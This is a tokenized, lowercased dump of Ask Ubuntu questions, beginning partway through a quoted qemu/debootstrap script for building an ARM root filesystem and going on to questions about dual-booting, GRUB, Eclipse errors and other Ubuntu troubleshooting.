line '' ] & & [ ! `` $ ( echo $ line|grep 'uncompressing linux ' ) '' ] & & \ [ ! `` $ ( echo $ line|grep 'unknown lcd panel ' ) '' ] & & \ [ ! `` $ ( echo $ line|grep 'restarting system ' ) '' ] ; then echo $ { line } > > $ log 2 > & 1 if [ ! `` $ quiet '' ] ; then echo `` $ { line } '' fi fi done < $ qemufifo rm -f $ qemupid [ $ quiet ] || echo `` i : virtual machine done '' } roll_tarball ( ) { # create a rootfs tgz [ $ quiet ] || echo `` i : creating tarball from rootfs '' mount_image cd $ mountpoint > > $ log 2 > & 1 lang=c tar czvf ../armel-rootfs- $ stamp.tgz . > > $ log 2 > & 1 mv ../armel-rootfs- $ stamp.tgz $ dir > > $ log 2 > & 1 echo `` i : arm rootfs created as $ dir/armel-rootfs- $ stamp.tgz '' cd - > /dev/null 2 > & 1 } save_qemu_img ( ) { cp $ imagename $ dir echo `` i : qemu image saved as $ dir/qemu-armel- $ stamp.img '' } # target system name fqdn= '' '' # target user newuser= '' '' fullname= '' ubuntu system user '' passwd= '' '' # target package selection selection= '' ubuntu-minimal '' # change here to install ubuntu-desktop imagesize= '' 1g '' # make this 3g for an ubuntu-desktop install # default to the build system locale . /etc/environment newlocale= $ lang # default to the build system keyboard setup kbdata= '' /etc/default/console-setup '' xkbl= $ ( grep xkblayout $ { kbdata } |tr -d ' '' '|cut -d '= ' -f2 ) xkbm= $ ( grep xkbmodel $ { kbdata } |tr -d ' '' '|cut -d '= ' -f2 ) xkbv= $ ( grep xkbvariant $ { kbdata } |tr -d ' '' '|cut -d '= ' -f2 ) xkbo= $ ( grep xkboptions $ { kbdata } |tr -d ' '' '|cut -d '= ' -f2 ) # default to the build system timezone tzone= $ ( cat /etc/timezone ) # target apt setup mirror= '' http : //ports.ubuntu.com/ubuntu-ports '' components= '' main universe '' # builder defaults defgroups= '' admin , adm , dialout , cdrom , floppy , audio , dip , video '' stamp= $ ( date + % y % m % d % h % m ) builddir= $ ( mktemp -d ) mountpoint= '' $ { builddir } /tmpmount '' imagename= '' $ { builddir } /qemu-armel- $ stamp.img '' qemupid= '' $ { builddir } /qemu.pid '' qemufifo= '' $ { builddir } /qemufifo '' dbpid= '' $ { builddir } /debootstrap.pid '' dbfifo= '' $ { builddir } /dbfifo '' dir= '' $ ( pwd ) '' # general defaults log= '' $ builddir/ $ ( basename $ 0 ) - $ stamp.log '' kernel= '' http : //people.ubuntu.com/~ogra/arm/qemu/kernel/vmlinuz-2.6.28-versatile '' debootstrap_min_ver= '' 1.0.10ubuntu3 '' dbsv= '' $ ( debootstrap -- version|cut -d `` `` -f2 ) '' # we need root if [ $ ( id -u ) ! = 0 ] ; then echo `` must be run as root '' exit 2 fi if [ ! $ ( which qemu-system-arm ) ] ; then echo `` qemu not installed , please use : '' echo `` sudo apt-get install qemu '' echo `` to install the qemu package ! '' exit 1 fi if [ ! $ ( which debootstrap ) ] ; then echo `` debootstrap not installed , please use : '' echo `` sudo apt-get install debootstrap '' echo `` to install the debootstrap package ! '' exit 1 fi if $ ( dpkg -- compare-versions $ dbsv lt $ debootstrap_min_ver ) ; then echo `` wrong debootstrap version detected , please install at least '' echo `` debootstrap version $ debootstrap_min_ver to make this script work '' echo `` you can download it from : '' echo `` http : //archive.ubuntu.com/ubuntu/pool/main/d/debootstrap/debootstrap_ $ { debootstrap_min_ver } _all.deb '' echo `` and install the downloaded package with : '' echo `` dpkg -i < download path > /debootstrap_ $ { debootstrap_min_ver } _all.deb '' exit 1 fi # parse commandline options while [ ! -z `` $ 1 '' ] ; do case $ 1 in -h| -- help ) usage ; ; -f| -- fqdn ) checkparm $ 2 fqdn= '' $ 2 '' ; ; -l| -- login ) checkparm $ 2 newuser= '' $ 2 '' ; ; -p| -- password ) checkparm $ 2 passwd= '' $ 2 '' ; ; -n| -- fullname ) checkparm $ 2 fullname= '' $ 2 '' ; ; -s| -- seed ) checkparm $ 2 selection= '' $ ( echo $ 2|tr ' , ' ' ' ) '' ; ; -i| -- imagesize ) checkparm $ 2 if [ ! `` $ ( echo $ 2|grep 'm ' ) '' ] & & \ [ ! `` $ ( echo $ 2|grep 'g ' ) '' ] ; then echo `` e : size needs to be in gigabyte or megabyte '' usage fi imagesize= '' $ 2 '' ; ; -m| -- mirror ) checkparm $ 2 mirror= '' $ 2 '' ; ; -c| -- components ) checkparm $ 2 components= '' $ ( echo $ 2|tr ' , ' ' ' ) '' ; ; -t| -- timezone ) checkparm $ 2 if [ ! `` $ ( echo $ 2|grep '/ ' ) '' ] ; then echo `` e : need a proper timezone '' usage fi tzone= '' $ 2 '' ; ; -- kblayout ) checkparm $ 2 xkbl= '' $ 2 '' ; ; -- kbmodel ) checkparm $ 2 xkbm= '' $ 2 '' ; ; -- kbvariant ) checkparm $ 2 xkbv= '' $ 2 '' ; ; -- kboptions ) checkparm $ 2 xkbo= '' $ 2 '' ; ; -x| -- locale ) checkparm $ 2 if [ ! `` $ ( echo $ 2|grep '_ ' ) '' ] ; then echo `` e : need a proper locale '' usage fi newlocale= '' $ 2 '' ; ; -- keepimage ) keepimage=1 ; ; -- notarball ) notarball=1 keepimage=1 ; ; -q| -- quiet ) quiet=1 ; ; esac shift done # process vars area= $ { tzone % % /* } zone= $ { tzone # */ } # check if we have at least hostname , login and password if [ ! `` $ { fqdn } '' ] || [ ! `` $ { newuser } '' ] || [ ! `` $ { passwd } '' ] ; then usage fi create_raw_image mount_image run_first_stage # basic fstab echo `` proc /proc proc defaults 0 0 '' > $ mountpoint/etc/fstab # set up basic networking interfaces= '' $ mountpoint/etc/network/interfaces '' echo `` auto lo '' > $ interfaces echo `` iface lo inet loopback '' > > $ interfaces # set up resolver hosts= '' $ mountpoint/etc/hosts '' echo `` 127.0.0.1 localhost '' > $ hosts echo `` 127.0.1.1 $ { fqdn } '' > > $ hosts echo `` $ { fqdn } '' > $ mountpoint/etc/hostname pw= $ ( perl -e 'print crypt ( $ argv [ 0 ] , `` qemuonarm '' ) ' , $ passwd ) # write installer script to image cat > $ builddir/installer < < eof # ! /bin/bash set -e export path export lc_all=c /debootstrap/debootstrap -- second-stage echo `` i : starting basic services in vm '' /etc/init.d/mountkernfs.sh start || true /etc/init.d/hostname.sh start || true mount -o remount -a || true /etc/init.d/loopback start || true /etc/init.d/udev start || true /etc/init.d/mountdevsubfs.sh start || true /etc/init.d/procps start || true /etc/init.d/mtab.sh start || true /etc/init.d/mountall.sh start || true /etc/init.d/udev-finish start || true /etc/init.d/networking start || true echo `` deb $ { mirror } precise $ { components } '' > /etc/apt/sources.list ifconfig eth0 up dhclient eth0 locale-gen -- no-purge en || true locale-gen -- no-purge $ { newlocale } || true echo lang= $ { newlocale } > > /etc/environment sed -i -e 's/^xkbmodel= . *\ $ /xkbmodel= '' $ { xkbm } '' / ' /etc/default/console-setup || true sed -i -e 's/^xkblayout= . *\ $ /xkblayout= '' $ { xkbl } '' / ' /etc/default/console-setup || true sed -i -e 's/^xkbvariant= . *\ $ /xkbvariant= '' $ { xkbv } '' / ' /etc/default/console-setup || true sed -i -e 's/^xkboptions= . *\ $ /xkboptions= '' $ { xkbo } '' / ' /etc/default/console-setup || true echo $ { area } / $ { zone } > /etc/timezone cp -f /usr/share/zoneinfo/ $ { area } / $ { zone } /etc/localtime || true apt-get update apt-get clean apt-get -y install $ { selection } apt-get clean groupadd admin || true useradd -g $ { defgroups } -s /bin/bash -m -p $ { pw } -c `` $ { fullname } '' $ { newuser } || true echo ' % admin all= ( all ) all ' > > /etc/sudoers passwd -l root || true /etc/init.d/networking stop || true /etc/init.d/udev-finish stop || true /etc/init.d/mountall.sh stop || true /etc/init.d/mtab.sh stop || true /etc/init.d/procps stop || true /etc/init.d/mountdevsubfs.sh stop || true /etc/init.d/udev stop || true /etc/init.d/loopback stop || true /etc/init.d/hostname.sh stop || true /etc/init.d/mountkernfs.sh stop || true rm /bin/installer & & reboot -fp eof mv $ builddir/installer $ mountpoint/bin/ > > $ log 2 > & 1 chmod +x $ mountpoint/bin/installer > > $ log 2 > & 1 # make sure we 're not mounted umount $ mountpoint > > $ log 2 > & 1 # run vm for second stage run_vm # build a rootfs tarball if [ ! `` $ notarball '' ] ; then roll_tarball fi # save a qemu image if [ `` $ keepimage '' ] ; then save_qemu_img fi # clean up and save a log cleanup due to limit partial log follows : formatting '/tmp/tmp.birwxgih8h/qemu-armel-201204251942.img ' , fmt=raw size=3221225472 mke2fs 1.42 ( 29-nov-2011 ) discarding device blocks : 4096/786432528384/786432 done filesystem label= os type : linux block size=4096 ( log=2 ) fragment size=4096 ( log=2 ) stride=0 blocks , stripe width=0 blocks 196608 inodes , 786432 blocks 39321 blocks ( 5.00 % ) reserved for the super user first data block=0 maximum filesystem blocks=805306368 24 block groups 32768 blocks per group , 32768 fragments per group 8192 inodes per group superblock backups stored on blocks : 32768 , 98304 , 163840 , 229376 , 294912 allocating group tables : 0/24 1/24 2/24 3/24 4/24 5/24 6/24 7/24 8/24 9/2410/2411/2412/2413/2414/2415/2416/2417/2418/2419/2420/2421/2422/2423/24 done writing inode tables : 0/24 1/24 2/24 3/24 4/24 5/24 6/24 7/24 8/24 9/2410/2411/2412/2413/2414/2415/2416/2417/2418/2419/2420/2421/2422/2423/24 done writing superblocks and filesystem accounting information : 0/24 1/24 2/24 3/24 4/24 5/24 6/24 7/24 8/24 9/2410/2411/2412/2413/2414/2415/2416/2417/2418/2419/2420/2421/2422/2423/24 done [ part deleted : downloading and extracting packages ] -- 2012-04-25 19:45:00 -- http : //people.ubuntu.com/~ogra/arm/qemu/kernel/vmlinuz-2.6.28-versatile resolving people.ubuntu.com ( people.ubuntu.com ) ... 91.189.94.199 connecting to people.ubuntu.com ( people.ubuntu.com ) |91.189.94.199|:80 ... connected . http request sent , awaiting response ... 302 found location : http : //people.canonical.com/~ogra/arm/qemu/kernel/vmlinuz-2.6.28-versatile [ following ] -- 2012-04-25 19:45:00 -- http : //people.canonical.com/~ogra/arm/qemu/kernel/vmlinuz-2.6.28-versatile resolving people.canonical.com ( people.canonical.com ) ... 91.189.89.62 connecting to people.canonical.com ( people.canonical.com ) |91.189.89.62|:80 ... connected . http request sent , awaiting response ... 200 ok length : 1674880 ( 1.6m ) [ text/plain ] saving to : `/tmp/tmp.birwxgih8h/qemu-vmlinuz' [ part deleted : download ] 2012-04-25 19:45:07 ( 220 kb/s ) - `/tmp/tmp.birwxgih8h/qemu-vmlinuz ' saved [ 1674880/1674880 ] kernel panic - not syncing : attempted to kill init ! i : killed ... thanks
125128	how to resolve `` fail to tetch '' errors and connect to internet ?	any software of mine ca n't connect to internet . not update manager and not even play on linux ! please help me , it happens to me and i do n't know why or how to solve this problem .
125132	dual boot-ubuntu and windows partition problem	i just bought a laptop with ubuntu pre-installed.because my linux skills are not good at all i prefer to have both os on my computer.my trouble is : when i try to boot the windows installer , i always get the blue-screen . from my researches it is caused by the mbr partition that is in conflict with the windows fat/ntfs.i tried to set up another partition from the linux disk utility but was unable to modify anything.i always get that editing or modifying the partition can not be done . can you help me ? i need the time to know linux better , because not even the internet is not working on this laptop , for me to at least have the chance to learn more .
125134	`` udevd [ 96 ] : timeout : '' error killing blkid when booting from a live cd	i have a dell inspiron 4100 and keep getting the following error when attempting a ubuntu trial on a cd . udevd [ 96 ] : timeout : killing '/sbin/blkid -o udev -p /dev/sda ' [ 121 ] eventually , i am taken to a screen that says ubuntu with five flashing dots underneath but it does n't progress further . side notes : the hard drive in the laptop is failing , hence why i am trying to boot from cd . the cd was burned on a mac . the computer is too old to boot from usb . thank you do much for your help !
125140	dualboot windows and ubuntu but automatically boot in ubuntu	i sometimes need windows for some school projects . so i was thinking is there anyway to have both windows and ubuntu installed but automatically boot in ubuntu but if i pressed f12 or just something when booting like when i 'm going into the bios then i could choose between windows and ubuntu ? edit : i installed windows now . and i wan na know how i wont see the grub loader when i boot and it just automatically boots into ubuntu . and if i press and hold `` shift '' i will see the grub loader and will be able to choose windows
125150	unsatisfied link error and missing .so files when starting eclipse	i upgraded to the 12.04 beta yesterday . now , when i try to start eclipse , i get the splash screen and then this error message : an error has occurred . see the log file /home/gabriel/.eclipse/org.eclipse.platform_3.7.0_155965261/configuration/1335382319394.log . the log file says something like this : java.lang.unsatisfiedlinkerror : could not load swt library . reasons : no swt-gtk-3740 in java.library.path no swt-gtk in java.library.path ca n't load library : /home/gabriel/.swt/lib/linux/x86_64/libswt-gtk-3740.so ca n't load library : /home/gabriel/.swt/lib/linux/x86_64/libswt-gtk.so followed by many more error messages . the /home/gabriel/.swt/lib/linux/x86_64/ directory exists , but is empty . i also tried reinstalling eclipse with no success . any ideas ?
125153	team viewer on ubuntu ! is it running through wine ?	i downloaded recently team viewer on my ubuntu system , so my question is : does it run through wine ? and if yes , why is this a .deb file ? is it possible to make .deb files but running with wine ? ***edit -- - > when i launched it for first time wine configuration showed up . is it necessary to post a screen-shot for that ?
125154	would adding more ram increase my speed in ubuntu , and how hard is this to do ?	i 've got a compaq 6910p 14 inch laptop with 1gb ram , 2.0ghz core2duo and a mobility radeon x2300 . i was wondering if adding more ram would help my computer if i add ram , will i have to reinstall ubuntu , do something special etc .
125164	how to disable `` ctrl + alt + fn '' shortcut ?	i 'd like to use ctrl + alt + f4 shortcut ( in eclipse ) , but it 's caught by ubuntu and i can not find , how to disable it . thanks
125173	why does sort perform much faster on my slackware server ?	i have a powerful machine with 32gb ram , 10tb hard disk storage , and an intel core i7 3.3ghz processor . we installed ubuntu server 11.10 and tried some scripts : the most impressive was a sort file.txt | uniq -c on a text file of 2.2gb . it took around 4 minutes . after that we installed slackware 11.37 and the same script finished in less than a minute on a text file of 2.2gb . do you guys have any idea why that is ? on every study we saw before always ubuntu performed better than slackware . both installations are default : ubuntu with gnome and slackware with kde .
125183	is /boot partition needed after os is booted ?	i have an encrypted root partition ( main hard drive ) and my /boot is on a usb drive with a certain section of the usb drive 's bits acting as the key for the encrypted partition . of course i have to have this thumb drive attached to boot into the os , however my i am wondering if it is ok to unmount /boot and remove that usb drive after the os is booted ?
125188	clean up files after a process dies	i have an application that does a lot of forking , and every fork uses quite a lot of temp disk space . currently , all of this space is used in /tmp . for various reasons , i want to clean up these tmp files asap after the process dies , preferably instantly . the problem is that in many cases , the proc are terminated irregularly ; hence the process itself should not be responsible for cleaning up its tmp files . what would be a nice way to set this up so that tmp files are removed when the process dies ? i was thinking about writing files to /tmp/myapp/ $ pid/ and then having a cron job every second or so that searches for directories /tmp/myapp/ $ pid/ and unlinks the ones for which there is no active process with that id . but that might create a lot of overhead . also for fun i tried if i could actually put the dir inside of the proc mkdir /proc/12345/tmp but that does n't fly either : - )
125191	another `` windows 7 entry missing from grub2 '' question	like many before me had the following problem that after installing ubuntu ( with windows 7 already installed ) , the grub boot loader wouldnt show windows 7 as a boot option , though i can boot fine if i use the `` choose boot device '' options on the x220 . the difference is that i try using uefi only so many answers did n't really fit my problem , though i tried several stuffs : after running boot repair it destroyed the ubuntu boot loader custom entry in /etc/grub.d/40_custom for windows which doesnt show up many update-grub and reboots trying windows repair recovery thing while being there i also did bootrec.exe /fixboot and update-grub and reboot again and finaly because it was so much fun , i installed linux all over again , while formatting and deleting everything linux related before that . now that i think of it , ubuntu also did n't notice windows being there during the setup and it still doesnt according to the boot info from boot repair . boot info script 0.61-git-patched [ 23 april 2012 ] ============================= boot info summary : =============================== = > no boot loader is installed in the mbr of /dev/sda . sda1 : __________________________________________________________________________ file system : vfat boot sector type : windows 7 : fat32 boot sector info : no errors found in the boot parameter block . operating system : boot files : /efi/boot/bootx64.efi /efi/ubuntu/grubx64.efi sda2 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe sda4 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu precise ( development branch ) boot files : /boot/grub/grub.cfg /etc/fstab sda5 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : sda6 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 625,142,447 625,142,447 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 2,048 206,847 204,800 efi system partition /dev/sda2 206,848 468,991 262,144 microsoft reserved partition ( windows ) /dev/sda3 468,992 170,338,303 169,869,312 data partition ( windows/linux ) /dev/sda4 170,338,304 330,338,304 160,000,001 data partition ( windows/linux ) /dev/sda5 330,338,305 617,141,039 286,802,735 data partition ( windows/linux ) /dev/sda6 617,141,040 625,141,040 8,000,001 swap partition ( linux ) '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 885c-ed1b vfat /dev/sda3 ee06cc0506cbccb1 ntfs /dev/sda4 604dd3b2-64ca-4200-b8fb-820e8d0ca899 ext4 /dev/sda5 d62515fd-8120-4a74-b17b-0bdf244124a3 ext4 /dev/sda6 7078b649-fb2a-4c59-bd03-fd31ef440d37 swap ================================ mount points : ================================= device mount_point type options /dev/sda1 /boot/efi vfat ( rw ) /dev/sda4 / ext4 ( rw , errors=remount-ro ) /dev/sda5 /home ext4 ( rw ) =========================== sda4/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod efi_gop insmod efi_uga insmod video_bochs insmod video_cirrus } insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt4 ) ' search -- no-floppy -- fs-uuid -- set=root 604dd3b2-64ca-4200-b8fb-820e8d0ca899 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt4 ) ' search -- no-floppy -- fs-uuid -- set=root 604dd3b2-64ca-4200-b8fb-820e8d0ca899 set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ 1 '' if [ `` $ 1 '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.2.0-20-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt4 ) ' search -- no-floppy -- fs-uuid -- set=root 604dd3b2-64ca-4200-b8fb-820e8d0ca899 linux /boot/vmlinuz-3.2.0-20-generic root=uuid=604dd3b2-64ca-4200-b8fb-820e8d0ca899 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-20-generic } menuentry 'ubuntu , with linux 3.2.0-20-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt4 ) ' search -- no-floppy -- fs-uuid -- set=root 604dd3b2-64ca-4200-b8fb-820e8d0ca899 echo 'loading linux 3.2.0-20-generic ... ' linux /boot/vmlinuz-3.2.0-20-generic root=uuid=604dd3b2-64ca-4200-b8fb-820e8d0ca899 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-20-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt4 ) ' search -- no-floppy -- fs-uuid -- set=root 604dd3b2-64ca-4200-b8fb-820e8d0ca899 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt4 ) ' search -- no-floppy -- fs-uuid -- set=root 604dd3b2-64ca-4200-b8fb-820e8d0ca899 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda4/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda4 during installation uuid=604dd3b2-64ca-4200-b8fb-820e8d0ca899 / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sda1 during installation uuid=885c-ed1b /boot/efi vfat defaults 0 1 # /home was on /dev/sda5 during installation uuid=d62515fd-8120-4a74-b17b-0bdf244124a3 /home ext4 defaults 0 2 # swap was on /dev/sda6 during installation uuid=7078b649-fb2a-4c59-bd03-fd31ef440d37 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda4 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) 129.422874451 = 138.966753280 boot/grub/grub.cfg 1 83.059570312 = 89.184534528 boot/initrd.img-3.2.0-20-generic 2 101.393131256 = 108.870045696 boot/vmlinuz-3.2.0-20-generic 1 83.059570312 = 89.184534528 initrd.img 2 101.393131256 = 108.870045696 vmlinuz 1 additional information : =================== log of boot-repair 2012-04-25__23h40 =================== boot-repair version : 3.18-0ppa3~precise boot-sav version : 3.18-0ppa4~precise glade2script version : 0.3.2.1-0ppa7~precise internet : connected python-software-properties version : 0.82.7 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 591 not upgraded . dpkg-preconfigure : unable to re-open stdin : no such file or directory boot-repair is executed in installed-session ( ubuntu precise ( development branch ) , precise , ubuntu , x86_64 ) warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . =================== osprober : /dev/sda4 : the os now in use - ubuntu precise ( development branch ) currentsession : linux =================== blkid : /dev/sda3 : uuid= '' ee06cc0506cbccb1 '' type= '' ntfs '' /dev/sda1 : uuid= '' 885c-ed1b '' type= '' vfat '' /dev/sda4 : uuid= '' 604dd3b2-64ca-4200-b8fb-820e8d0ca899 '' type= '' ext4 '' /dev/sda5 : uuid= '' d62515fd-8120-4a74-b17b-0bdf244124a3 '' type= '' ext4 '' /dev/sda6 : uuid= '' 7078b649-fb2a-4c59-bd03-fd31ef440d37 '' type= '' swap '' 1 disks with os , 1 os : 1 linux , 0 macos , 0 windows , 0 unknown type os . warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util sfdisk does n't support gpt . use gnu parted . =================== /etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 # grub_hidden_timeout=0 # grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' efi_of_part [ 1 ] ( , ) =================== dmesg | grep efi : [ 0.000000 ] efi v2.00 by lenovo [ 0.000000 ] kernel-defined memdesc does n't match the one from efi ! [ 0.000000 ] efi : mem00 : type=3 , attr=0xf , range= [ 0x0000000000000000-0x0000000000001000 ) ( 0mb ) [ 0.000000 ] efi : mem01 : type=7 , attr=0xf , range= [ 0x0000000000001000-0x000000000004e000 ) ( 0mb ) [ 0.000000 ] efi : mem02 : type=3 , attr=0xf , range= [ 0x000000000004e000-0x0000000000058000 ) ( 0mb ) [ 0.000000 ] efi : mem03 : type=10 , attr=0xf , range= [ 0x0000000000058000-0x0000000000059000 ) ( 0mb ) [ 0.000000 ] efi : mem04 : type=7 , attr=0xf , range= [ 0x0000000000059000-0x000000000005e000 ) ( 0mb ) [ 0.000000 ] efi : mem05 : type=4 , attr=0xf , range= [ 0x000000000005e000-0x000000000005f000 ) ( 0mb ) [ 0.000000 ] efi : mem06 : type=3 , attr=0xf , range= [ 0x000000000005f000-0x00000000000a0000 ) ( 0mb ) [ 0.000000 ] efi : mem07 : type=2 , attr=0xf , range= [ 0x0000000000100000-0x00000000005b9000 ) ( 4mb ) [ 0.000000 ] efi : mem08 : type=7 , attr=0xf , range= [ 0x00000000005b9000-0x0000000020000000 ) ( 506mb ) [ 0.000000 ] efi : mem09 : type=0 , attr=0xf , range= [ 0x0000000020000000-0x0000000020200000 ) ( 2mb ) [ 0.000000 ] efi : mem10 : type=7 , attr=0xf , range= [ 0x0000000020200000-0x00000000364e4000 ) ( 354mb ) [ 0.000000 ] efi : mem11 : type=2 , attr=0xf , range= [ 0x00000000364e4000-0x000000003726a000 ) ( 13mb ) [ 0.000000 ] efi : mem12 : type=7 , attr=0xf , range= [ 0x000000003726a000-0x0000000040000000 ) ( 141mb ) [ 0.000000 ] efi : mem13 : type=0 , attr=0xf , range= [ 0x0000000040000000-0x0000000040200000 ) ( 2mb ) [ 0.000000 ] efi : mem14 : type=7 , attr=0xf , range= [ 0x0000000040200000-0x000000009df35000 ) ( 1501mb ) [ 0.000000 ] efi : mem15 : type=2 , attr=0xf , range= [ 0x000000009df35000-0x00000000d39a0000 ) ( 858mb ) [ 0.000000 ] efi : mem16 : type=4 , attr=0xf , range= [ 0x00000000d39a0000-0x00000000d39c0000 ) ( 0mb ) [ 0.000000 ] efi : mem17 : type=7 , attr=0xf , range= [ 0x00000000d39c0000-0x00000000d5df5000 ) ( 36mb ) [ 0.000000 ] efi : mem18 : type=4 , attr=0xf , range= [ 0x00000000d5df5000-0x00000000d6990000 ) ( 11mb ) [ 0.000000 ] efi : mem19 : type=7 , attr=0xf , range= [ 0x00000000d6990000-0x00000000d6b82000 ) ( 1mb ) [ 0.000000 ] efi : mem20 : type=1 , attr=0xf , range= [ 0x00000000d6b82000-0x00000000d6b9f000 ) ( 0mb ) [ 0.000000 ] efi : mem21 : type=7 , attr=0xf , range= [ 0x00000000d6b9f000-0x00000000d77b0000 ) ( 12mb ) [ 0.000000 ] efi : mem22 : type=4 , attr=0xf , range= [ 0x00000000d77b0000-0x00000000d780a000 ) ( 0mb ) [ 0.000000 ] efi : mem23 : type=7 , attr=0xf , range= [ 0x00000000d780a000-0x00000000d7826000 ) ( 0mb ) [ 0.000000 ] efi : mem24 : type=4 , attr=0xf , range= [ 0x00000000d7826000-0x00000000d7868000 ) ( 0mb ) [ 0.000000 ] efi : mem25 : type=7 , attr=0xf , range= [ 0x00000000d7868000-0x00000000d7869000 ) ( 0mb ) [ 0.000000 ] efi : mem26 : type=4 , attr=0xf , range= [ 